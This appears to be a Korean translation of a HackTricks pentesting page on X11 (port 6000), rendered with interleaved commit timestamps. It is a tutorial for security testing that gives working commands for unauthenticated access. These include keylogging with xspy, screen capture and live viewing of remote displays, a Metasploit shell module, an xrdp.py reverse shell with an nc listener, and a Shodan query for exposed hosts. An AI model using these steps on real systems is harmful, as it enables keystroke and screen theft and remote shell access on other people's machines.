2024-07-19 11:35:15 +00:00
# 6000 - Pentesting X11
2022-04-28 16:01:33 +00:00
2024-07-19 11:35:15 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 11:35:15 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 11:35:15 +00:00
< summary > Support HackTricks< / summary >
2024-01-03 10:42:55 +00:00
2024-07-19 11:35:15 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 11:35:15 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-05-05 22:46:17 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-07-19 11:35:15 +00:00
Join [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) server to communicate with experienced hackers and bug bounty hunters!
2023-02-27 09:28:45 +00:00
2024-07-19 11:35:15 +00:00
**Hacking Insights**\
해킹의 스릴과 도전에 대해 깊이 있는 콘텐츠에 참여하세요.
2023-02-27 09:28:45 +00:00
2024-07-19 11:35:15 +00:00
**Real-Time Hack News**\
실시간 뉴스와 통찰력을 통해 빠르게 변화하는 해킹 세계의 최신 정보를 유지하세요.
2023-07-14 15:03:41 +00:00
2024-07-19 11:35:15 +00:00
**Latest Announcements**\
새로운 버그 바운티 출시 및 중요한 플랫폼 업데이트에 대한 정보를 유지하세요.
2023-07-14 15:03:41 +00:00
2024-07-19 11:35:15 +00:00
**Join us on** [**Discord** ](https://discord.com/invite/N3FrSbmwdy ) and start collaborating with top hackers today!
2022-11-05 09:07:43 +00:00
2024-07-19 11:35:15 +00:00
## Basic Information
2020-07-15 15:43:14 +00:00
2024-07-19 11:35:15 +00:00
**X Window System** (X)는 UNIX 기반 운영 체제에서 널리 사용되는 다목적 윈도우 시스템입니다. 이는 개별 프로그램이 사용자 인터페이스 디자인을 처리하는 그래픽 **user interfaces (GUIs)**를 생성하기 위한 프레임워크를 제공합니다. 이러한 유연성은 X 환경 내에서 다양한 맞춤형 경험을 가능하게 합니다.
2020-07-15 15:43:14 +00:00
2024-07-19 11:35:15 +00:00
**Default port:** 6000
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
PORT STATE SERVICE
6000/tcp open X11
```
2024-07-19 11:35:15 +00:00
## Enumeration
2020-07-15 15:43:14 +00:00
2024-07-19 11:35:15 +00:00
**익명 연결** 확인:
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script x11-access -p < PORT > < IP >
msf> use auxiliary/scanner/x11/open_x11
```
2024-07-19 11:35:15 +00:00
#### Local Enumeration
2020-07-15 15:43:14 +00:00
2024-07-19 11:35:15 +00:00
사용자의 홈 폴더에 있는 파일 ** `.Xauthority` **는 **X11의 인증**에 **사용됩니다** . [**여기** ](https://stackoverflow.com/a/37367518 )에서:
2023-12-29 08:56:54 +00:00
```bash
$ xxd ~/.Xauthority
00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d ............0..M
00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d IT-MAGIC-COOKIE-
00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X
00000030: 041d ef ...
```
2024-07-19 11:35:15 +00:00
> MIT-magic-cookie-1: 128비트 키(“쿠키”)를 생성하고 이를 \~/.Xauthority(또는 XAUTHORITY envvar가 가리키는 위치)에 저장합니다. 클라이언트는 이를 서버에 평문으로 전송합니다! 서버는 이 “쿠키”의 복사본이 있는지 확인하고, 있다면 연결이 허용됩니다. 키는 DMX에 의해 생성됩니다.
2023-04-07 00:41:31 +00:00
{% hint style="warning" %}
2024-07-19 11:35:15 +00:00
**쿠키를 사용하기 위해** 환경 변수를 설정해야 합니다: ** `export XAUTHORITY=/path/to/.Xauthority` **
2023-04-07 00:41:31 +00:00
{% endhint %}
2024-02-10 21:30:13 +00:00
#### 로컬 열거 세션
2023-12-29 08:56:54 +00:00
```bash
2024-02-10 21:30:13 +00:00
$ w
23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12
2023-12-29 08:56:54 +00:00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user tty7 :0 13Oct23 76days 13:37 2.20s xfce4-session
```
2024-07-19 11:35:15 +00:00
예제에서 `localhost:0` 은 xfce4-session을 실행하고 있었습니다.
2023-12-29 08:56:54 +00:00
2024-07-19 11:35:15 +00:00
## 연결 확인
2020-07-15 15:43:14 +00:00
```bash
xdpyinfo -display < ip > :< display >
xwininfo -root -tree -display < IP > :< display > #Ex: xwininfo -root -tree -display 10.5.5.12:0
```
2024-02-10 21:30:13 +00:00
## 키로깅
2020-07-15 15:43:14 +00:00
2024-07-19 11:35:15 +00:00
[xspy ](http://tools.kali.org/sniffingspoofing/xspy )를 사용하여 키보드 입력을 스니핑합니다.
2020-07-15 15:43:14 +00:00
2024-02-10 21:30:13 +00:00
샘플 출력:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
xspy 10.9.xx.xx
opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
```
2024-07-19 11:35:15 +00:00
## 스크린샷 캡처
2024-02-10 21:30:13 +00:00
```bash
xwd -root -screen -silent -display < TargetIP:0 > > screenshot.xwd
convert screenshot.xwd screenshot.png
```
## 원격 데스크톱 보기
2024-07-19 11:35:15 +00:00
Way from: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref ](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref )
2024-02-10 21:30:13 +00:00
```
./xrdp.py < IP:0 >
```
2024-05-05 22:46:17 +00:00
Way from: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html ](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html )
2024-02-10 21:30:13 +00:00
2024-05-05 22:46:17 +00:00
먼저 xwininfo를 사용하여 창의 ID를 찾아야 합니다.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
xwininfo -root -display 10.9.xx.xx:0
xwininfo: Window id: 0x45 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1024x768+0+0
```
**XWatchwin**
2024-07-19 11:35:15 +00:00
**실시간 보기**를 위해 우리는 사용해야 합니다.
2020-07-15 15:43:14 +00:00
```bash
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
```
2024-07-19 11:35:15 +00:00
## 셸 얻기
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
msf> use exploit/unix/x11/x11_keyboard_exec
```
2024-07-19 11:35:15 +00:00
**리버스 셸:** Xrdp는 또한 Netcat을 통해 리버스 셸을 허용합니다. 다음 명령어를 입력하세요:
2024-02-08 21:36:35 +00:00
```bash
./xrdp.py \<IP:0> – no-disp
```
2024-07-19 11:35:15 +00:00
인터페이스에서 **R-shell 옵션**을 볼 수 있습니다.
2020-07-15 15:43:14 +00:00
2024-07-19 11:35:15 +00:00
그런 다음, 로컬 시스템에서 포트 5555에서 **Netcat 리스너**를 시작합니다.
2024-02-08 21:36:35 +00:00
```bash
nc -lvp 5555
```
2024-07-19 11:35:15 +00:00
그런 다음, **R-Shell** 옵션에 IP 주소와 포트를 입력하고 **R-shell**을 클릭하여 셸을 얻습니다.
2020-07-15 15:43:14 +00:00
2024-07-19 11:35:15 +00:00
## References
2024-05-05 22:46:17 +00:00
2024-02-08 21:36:35 +00:00
* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref ](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref )
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html ](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html )
* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref ](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref )
2020-09-24 20:01:29 +00:00
2023-03-05 19:54:13 +00:00
## Shodan
2020-09-24 20:01:29 +00:00
* `port:6000 x11`
2022-04-28 16:01:33 +00:00
2024-05-05 22:46:17 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-07-14 15:03:41 +00:00
2024-07-19 11:35:15 +00:00
경험이 풍부한 해커 및 버그 바운티 헌터와 소통하기 위해 [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) 서버에 참여하세요!
2022-11-05 09:07:43 +00:00
2024-07-19 11:35:15 +00:00
**Hacking Insights**\
해킹의 스릴과 도전에 대해 깊이 있는 콘텐츠에 참여하세요.
2023-02-27 09:28:45 +00:00
2024-07-19 11:35:15 +00:00
**Real-Time Hack News**\
실시간 뉴스와 통찰력을 통해 빠르게 변화하는 해킹 세계의 최신 정보를 유지하세요.
2023-02-27 09:28:45 +00:00
2024-07-19 11:35:15 +00:00
**Latest Announcements**\
새로운 버그 바운티 출시 및 중요한 플랫폼 업데이트에 대한 정보를 유지하세요.
2023-02-27 09:28:45 +00:00
2024-07-19 11:35:15 +00:00
**지금** [**Discord** ](https://discord.com/invite/N3FrSbmwdy )에 참여하여 최고의 해커들과 협업을 시작하세요!
2022-11-05 09:07:43 +00:00
2024-07-19 11:35:15 +00:00
{% hint style="success" %}
AWS 해킹 배우기 및 연습하기:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCP 해킹 배우기 및 연습하기: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 11:35:15 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 11:35:15 +00:00
< summary > Support HackTricks< / summary >
2024-01-03 10:42:55 +00:00
2024-07-19 11:35:15 +00:00
* [**구독 계획** ](https://github.com/sponsors/carlospolop ) 확인하기!
* 💬 [**Discord 그룹** ](https://discord.gg/hRep4RUj7f ) 또는 [**텔레그램 그룹** ](https://t.me/peass )에 참여하거나 **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**를 팔로우하세요.**
* [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 및 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 11:35:15 +00:00
{% endhint %}